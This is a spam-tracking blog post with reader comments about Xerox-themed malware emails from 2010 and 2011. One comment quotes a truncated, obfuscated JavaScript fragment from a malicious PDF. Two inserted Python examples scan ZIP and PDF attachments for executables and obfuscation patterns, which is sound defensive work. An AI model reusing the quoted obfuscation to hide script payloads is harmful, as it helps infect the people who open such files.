Scan from a Xerox WorkCentre Pro #5004716…Spam+Virus=Trouble


Posted by Mr Spamalicious | Posted in Computer Virus Spam - Open the Attachment or Follow a Link to Get Infected by a Trojan | Posted on 07-16-2010

Odd little virus trick. The file is XeroxN4495.zip and was sent by “Guest” so you know it’s trouble. I guess I’m supposed to be impressed that it was made using “Xerox WorkCentre Pro”.

Please open the attached document. It was scanned and sent to you using a Xerox
WorkCentre Pro.

Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]

WorkCentre Pro Location: machine location not set
Device Name: XRX4723AA7ACDB49135879

For more information on Xerox products and solutions, please visit

http://www.xerox.com

Rating: 4.4/5 (10 votes cast)

Comments (23)

I’ve received three of these so far today, 07/16/10. It’s the first day it’s shown up in my mailbox.

I give the spyware boys some credit for changing from that tired old “UPS Delivery Notification.” That is sooo February.

I checked the IP addresses of two of them and it seems they are creating email accounts on a legit company’s email server but the email address is made up by the scammers. The display name is something innocuous but the email account name is unlike any corporate name convention I’ve ever seen; “Dick” mbetx@legitcompany.com, for example.

Until the IT gang at the hijacked company notices an invalid account name or unusually high email traffic, the scammers will keep using the account.

Meanwhile, I miss the good ol’ days of IRS, Bank, and UPS notices.

Rating: 4.7/5 (3 votes cast)

Too funny H.R.
Thanks for posting. Perhaps you should send the company a courtesy “you’ve been fucked by spammers” email. Doubt it will help. Months ago I notified “asasteelstructures.co.uk” that their site had been hacked and was distributing a virus and it’s still hacked.

Rating: 0.0/5 (0 votes cast)

I have sent courtesy emails to companies in the past whose systems were compromised, but hey! I’ve got a real job and can’t be the spam/trojan horse cop for the whole internet.

After posting the above, I got my 4th one today. This one was using a legitimate standard mail account naming convention; initial.lastname. SOMEONE is sure as heck going to notice a huge leap in e-mail traffic.

This site was the first I found with the new subject line. (Same ol’ scams, only the subject lines change, eh?)

I thought I’d post to help boost the site so others who have the sense God gave a goat to check out odd emails before opening them wouldn’t have to scroll so much to confirm the scam.

Anyone not suspicious enough to check out FWD: “This is too funeee!!” emails – even if it’s forwarded by their mother – isn’t going to search anyhow.

I appreciate it when people post the latest scams to scamtracker sites like this, so I thought I’d be polite and post too, since I seem to be one of the early ones hit.

Rating: 3.0/5 (2 votes cast)

I hear you. I do this site to maintain my sanity and amuse myself. I have a dozen or so emails I check so when there is a new scam I get hit hard. Then I post it here and then people find my site and it confirms their suspicions. Then smart curious folks like yourself add even more info. Works well I think. Thanks.

Rating: 5.0/5 (1 vote cast)

Hey guys, great resource… no need for profanity though… I sent some managers from my work to this resource to educate themselves on this threat; and then noticed the profanity…. no big deal…just sayin.

Rating: 0.0/5 (0 votes cast)

I hear you Cole, but this is one of the few places Mr Spamalicious gets to be as crude as he wants, so I let it rip now and then. Thanks for posting though. This blog wasn’t intended to be a resource, it just turned out that way because I break so many of the new scams first by virtue of being self employed, having about a dozen email addresses, and being tied to my computer all day. So I notice a big wave of spam right away and then post it. Hope it was helpful for the managers.

Rating: 0.0/5 (0 votes cast)

Someone sending a virii and using another email address is common and doesn’t mean they “HACKED” anyone’s email account. It is VERY EASY to send an email from any pc/computer and claim to be someone that you are not and make the headers also look like it came from them. I use the term “HACK” very seriously since I am a network engineer / security specialist and hear that term just about every day. I think it is used by people these days to simply mean posing or faking. Anyhow this virii / malware is floating around and some of our customers are getting it and some actually open it and run the .exe file that is in the .zip file. I would caution anyone to never run an .exe, .com, .bat or any file that you are not expecting or don’t know its origin.

Tony

Rating: 5.0/5 (4 votes cast)

I’ll be bookmarking this site.

Rating: 0.0/5 (0 votes cast)

Hi
Just helping the thread
I have had 5 of these in twelve hours to one account. I agree the UPS was so February.

Sweet site.

Rating: 0.0/5 (0 votes cast)

Hi, thanks for the info, I’ve received two of these this morning and guessed they were suspect so glad of the confirmation you’ve given.
In this day and age does anyone fall for this type of scam?

Rating: 0.0/5 (0 votes cast)

Here is some additional info: http://blog.mxlab.eu/2010/07/17/oficla-trojan-in-emails-with-subject-scan-from-a-xerox-workcentre-pro/

Rating: 0.0/5 (0 votes cast)

Hi!
I got one of those yesterday and three today…
As I am on a Mac I already set up a new rule to immediately delete everything with Xerox in the subject.
I’ve got 24 different rules so far and adding…
Sometimes you wish you were a hacker and send something ‘nice’ back to those guys!

Rating: 0.0/5 (0 votes cast)

It would probably make more sense to train your spam filter to recognize it. Otherwise any email you get with Xerox in the subject will get deleted. But, depending on your business that may or may not be a problem.

Rating: 0.0/5 (0 votes cast)

7/16/10 I have had 10+ of these emails and my antivirus reacts so drastically that I have to log off and back on again just to get back control of the computer.

Rating: 0.0/5 (0 votes cast)

I have had 20+ of these emails so far to our main company email address – SpamAssassin always picks them up as spam though, so they go straight to the spam folder.

Rating: 0.0/5 (0 votes cast)

Seeing this too but our antivirus on our Exchange and SMTP gateway is catching it because it looks inside compressed files (ZIP) and the policy does not allow EXE type files, even based on actual code so renaming the EXE inside a ZIP doesn’t get it through. The only thing I’ve seen get through is when they password protect a ZIP file, the scanners can’t open it. I have seen malware emails that do that and give you the password in the email.

Anybody doing ISAT (Internet Security Awareness Training) with their end-users? Seems to be a new thing now with businesses to help their employees stop testing the network system. :-)

Rating: 0.0/5 (0 votes cast)
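The gateway policy the comment above describes, written out as an added example in Python (this is not code from the page or from any of the scanning products the thread mentions): every entry of a ZIP attachment is judged by its first bytes, so a Windows executable renamed to .doc is still caught, and a password-protected entry is blocked outright because the scanner cannot look inside it, which closes the bypass the commenter saw. The archives are constructed inline; the helper that marks an entry as encrypted patches the ZIP flag bits by hand because Python's zipfile cannot write encrypted archives, and the policy function itself is hypothetical.

```python
import io
import zipfile

PE_MAGIC = b"MZ"                                        # start of every Windows executable
BLOCKED_EXT = (".exe", ".com", ".bat", ".scr", ".pif")  # refused on name as well as content


def inspect_zip(data: bytes) -> dict:
    """Gateway verdict for one ZIP attachment given as bytes (hypothetical policy).

    Returns {'verdict': 'allow' | 'block', 'reasons': [...]}.  The decision is made
    on entry *content*: a renamed .exe is still caught, and an encrypted entry
    cannot be inspected at all, so it is blocked outright.
    """
    reasons = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"verdict": "block", "reasons": ["not a valid ZIP archive"]}
    with zf:
        for info in zf.infolist():
            if info.flag_bits & 0x1:                    # general-purpose bit 0 = encrypted
                reasons.append(f"{info.filename}: encrypted entry, cannot be scanned")
                continue
            if info.filename.lower().endswith(BLOCKED_EXT):
                reasons.append(f"{info.filename}: blocked extension")
            with zf.open(info) as entry:
                if entry.read(2) == PE_MAGIC:
                    reasons.append(f"{info.filename}: PE executable by content")
    return {"verdict": "block" if reasons else "allow", "reasons": reasons}


def build_zip(name: str, content: bytes, mark_encrypted: bool = False) -> bytes:
    """Constructed sample archive holding one stored entry.

    zipfile cannot write encrypted entries, so for the password-protected case
    bit 0 of the general-purpose flag is set by hand in the local file header
    (offset 6) and in the central directory record (offset 8).  The gateway then
    sees an entry it cannot open, which is all the policy needs to exercise.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, content)
    data = bytearray(buf.getvalue())
    if mark_encrypted:
        local = data.index(b"PK\x03\x04")
        central = data.index(b"PK\x01\x02")
        data[local + 6] |= 0x01
        data[central + 8] |= 0x01
    return bytes(data)


# Constructed samples: a PE file hiding behind a .doc name, a genuine OLE (.doc)
# header, and a "password-protected" archive of the kind the comment says slips
# past content scanners.
SAMPLES = {
    "renamed_exe": build_zip("scan_0001.doc", b"MZ\x90\x00" + b"\x00" * 60),
    "real_doc": build_zip("scan_0002.doc", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56),
    "locked": build_zip("scan_0003.exe", b"MZ\x90\x00", mark_encrypted=True),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        print(label, inspect_zip(blob))
    print("garbage", inspect_zip(b"not a zip at all"))
```

The encrypted case is the one worth noting: a gateway that silently "allows" what it cannot open is the gap the commenter describes, so the verdict here is block-by-default, and the reason string tells the help desk why a legitimate locked archive was held.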

Got the following email today, looks like this threat is still out there. Currently using a PDF and a zero-day exploit.
The PDF is named 18-01-2011-4.pdf

“”
Hello, ganzd.

Please open the attached document.
It was scanned and sent to you using a
XER0X Work Centre Pro.

Sent by: Guest
Number of Document: 1 Attachment
File Type: PDF
WorkCentre Pro Location: machine location not set Device Name: 51592608605656

For more information on XER0X products and solutions,
please visit XER0X.C0M
“”

The following JS is contained inside of it:
<</JavaScript <</Names [() <</S /JavaScript /JS (var vrj='';var q=app['ev12'.replace(12,'al')];var xfgfd = function(){return {e:'eva'}}().e;vmth=q(xfgfd+'1');cjpgh=vmth('new Date(2007,2,51,2,12,5)');cai = 'thi'+cjpgh.getHours()+;dycer;;hjr=vmth(cai.replace(2,'s.pro'));ar = hjr.split('q');var s = '';w = cjpgh.getHours()*2;var rlro = 'fro'+cjpgh.getHours()+'arCode';rlro=rlro.replace(2,'mCh');ocdzn=String[rlro];for (i = 0; i >] >> >> >> endobj xref trailer <>

HALP? :)

Rating: 0.0/5 (0 votes cast)

Our agency received a flurry of these this past weekend – pretty much the same naming pattern and content as Looop has posted, and the JavaScript looks nearly identical, too. In an odd twist, some recipients’ email had the PDF file as a distinct attachment, while others rec’d the email with no attachment, yet the PDF appeared embedded in the text of the email (corrupt?). Opening the suspect message with notepad, you could see the same JavaScript and PDF content as was in the PDF itself.

It got by Antigen for Exchange, IronPort, Trend Micro, and Symantec Endpoint Protection.

Disappointing that this threat has been out for awhile, and yet when I submitted the sample to VirusTotal.com, only 4 out of 43 AV products identified it as malicious. A resubmission today upped the total to 9 out of 43, but that’s still a pretty sad showing by the AV boys.

Rating: 0.0/5 (0 votes cast)
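A static check for the two observations above, added here as an example in Python (not code from the page, from the commenters, or from any of the products named): it flags PDF data that declares JavaScript or an OpenAction and shows the obfuscation idioms visible in the quoted snippet (reaching eval through app[...], assembling strings with .replace(), decoding with String.fromCharCode), and it looks in every MIME part, plain-text bodies included, so the "no attachment, PDF in the text" variant is caught as well. The PDF fragments and e-mails are constructed; the script inside the bad sample only rebuilds the word "eval" and decodes one character.

```python
import base64
import re
from email import message_from_bytes

# PDF name objects that make a file act when opened rather than just display.
ACTIVE_NAMES = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch"]

# Obfuscation idioms of the kind seen in the quoted snippet: eval reached via
# app[...] instead of by name, strings assembled with .replace(), and a payload
# decoded with String.fromCharCode / unescape.
OBFUSCATION = [
    re.compile(rb"app\s*\[", re.I),
    re.compile(rb"\.replace\s*\(", re.I),
    re.compile(rb"fromCharCode|unescape\s*\(", re.I),
    re.compile(rb"\[['\"]ev", re.I),
]


def pdf_regions(blob: bytes):
    """Yield each byte range that looks like a PDF: from a %PDF- header to %%EOF."""
    for m in re.finditer(rb"%PDF-", blob):
        end = blob.find(b"%%EOF", m.start())
        stop = end + len(b"%%EOF") if end != -1 else len(blob)
        yield blob[m.start():stop]


def score_pdf(pdf: bytes) -> dict:
    """Static verdict for one PDF region; nothing is rendered or executed."""
    active = [n.decode() for n in ACTIVE_NAMES if n in pdf]
    obf = sum(1 for pat in OBFUSCATION if pat.search(pdf))
    has_js = b"/JavaScript" in pdf or b"/JS" in pdf
    return {"active": active, "obfuscation_hits": obf, "suspicious": has_js and obf >= 2}


def scan_message(raw: bytes) -> dict:
    """Check every MIME part, including plain-text bodies, for embedded PDF data."""
    msg = message_from_bytes(raw)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        where = part.get_filename() or part.get_content_type()
        for pdf in pdf_regions(payload):
            findings.append({"where": where, **score_pdf(pdf)})
    return {"malicious": any(f["suspicious"] for f in findings), "findings": findings}


# Constructed PDF whose OpenAction runs obfuscated JavaScript.  The script only
# rebuilds the word "eval" and decodes a single character; it carries no payload.
BAD_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /JavaScript /JS (var q=app['ev12'.replace(12,'al')];"
    b"var s=String.fromCharCode(65);) >> endobj\n"
    b"%%EOF\n"
)
# Constructed benign PDF: a catalog and a page tree, no actions.
CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"


def build_message(pdf: bytes, as_attachment: bool) -> bytes:
    """Constructed e-mail carrying the PDF either as a base64 attachment or, as
    the comment above reports, dumped straight into the text of the message."""
    header = (b"From: Guest <scanner@example.invalid>\r\n"
              b"Subject: Scan from a Xerox WorkCentre Pro\r\n"
              b"MIME-Version: 1.0\r\n")
    if not as_attachment:
        return header + b"Content-Type: text/plain\r\n\r\nPlease open the attached document.\r\n" + pdf
    return (header
            + b'Content-Type: multipart/mixed; boundary="b1"\r\n\r\n'
            b"--b1\r\nContent-Type: text/plain\r\n\r\nPlease open the attached document.\r\n"
            b'--b1\r\nContent-Type: application/pdf; name="scan.pdf"\r\n'
            b"Content-Transfer-Encoding: base64\r\n"
            b'Content-Disposition: attachment; filename="scan.pdf"\r\n\r\n'
            + base64.encodebytes(pdf)
            + b"--b1--\r\n")


if __name__ == "__main__":
    for label, raw in [("attached", build_message(BAD_PDF, True)),
                       ("inline", build_message(BAD_PDF, False)),
                       ("clean", build_message(CLEAN_PDF, True))]:
        print(label, scan_message(raw))
```

The scoring deliberately needs both an active-content name and at least two obfuscation idioms before it calls a region suspicious: plenty of legitimate forms carry /JavaScript, and a rule on that name alone would quarantine them. Scanning the text body for a %PDF- header is what makes the difference for the "corrupt, no attachment" messages the commenter describes, which an attachment-only scanner never examines.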

I got an email today titled
Re: Scan from a Xerox W. Pro #888454

the sender’s email address is:
LORICanoq42H @

and then my email account address.

It has a zipped attachment called:
XEROX_Document_0821_53167.zip

I have copied this but not opened it.

As the last posting here is 21/1/2011 thought I’d add this info. I’m afraid I don’t have the expertise to investigate any further

Rating: 0.0/5 (0 votes cast)

James,

Don’t open it, but if you want, you can submit it to VirusTotal.com and have it examined. It will likely be malicious, but I’d be curious as to how many AV products actually can identify it as such.

The submission of the attachment is pretty simple. Just save the email attachment to your Desktop, then visit the VirusTotal.com website, and click the “Browse” button on their home page. Point it to the file saved on your Desktop, and send it on its way. It’ll take a minute or so to evaluate, unless someone has already submitted the exact file previously.

Once you’ve submitted it, make sure to DELETE the attachment. May as well delete the email, too, that it came in.

Rating: 0.0/5 (0 votes cast)

Many thanks for your reply and the information and advice.
I have submitted the file to VirusTotal. I’m not sure I have understood the report; the file had already been analysed. If my interpretation is correct, about half the AVs detected it.

Rating: 0.0/5 (0 votes cast)

Xerox emails are back at it. Received 2 today at roughly the same time 11am. From what I have read here I suspect to receive more. We use the xerox workcentre so it was very odd that I would get something from a gmail account scanned in from the xerox workcentre.

Rating: 0.0/5 (0 votes cast)

They are back again. We received a few of these today. The virus had been stripped off by our mail server before it made it to any clients, thankfully. Cause you know damn good and well they would have just clicked on the attachment as soon as they got the email…

Rating: 0.0/5 (0 votes cast)
